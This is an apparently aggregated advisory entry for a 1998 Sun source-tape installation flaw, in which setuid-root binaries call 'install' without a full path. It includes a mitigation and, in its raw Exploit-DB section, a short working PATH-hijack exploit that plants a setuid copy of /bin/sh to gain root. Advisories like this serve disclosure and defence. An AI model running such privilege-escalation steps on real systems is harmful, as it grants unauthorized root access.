Sun Source Tapes Installation Vulnerability

vendor:

Source Tapes

by:

SecurityFocus

7.2

CVSS

HIGH

Path Manipulation

CWE

Product Name: Source Tapes

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

1998

Sun Source Tapes Installation Vulnerability

The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable. This makes it possible for users on that system to become root by copying the shell to a temporary directory, creating an install script, setting the PATH environment variable, and executing the winstall binary.

Mitigation:

Ensure that the PATH environment variable is reset before executing any setuid binaries.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22/info

This applies to sites that have installed Sun Source tapes only.

The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable.

This makes it possible for users on that system to become root.

$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/install
$ chmod a+rx /tmp/install
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/winstall
$ /tmp/sh
#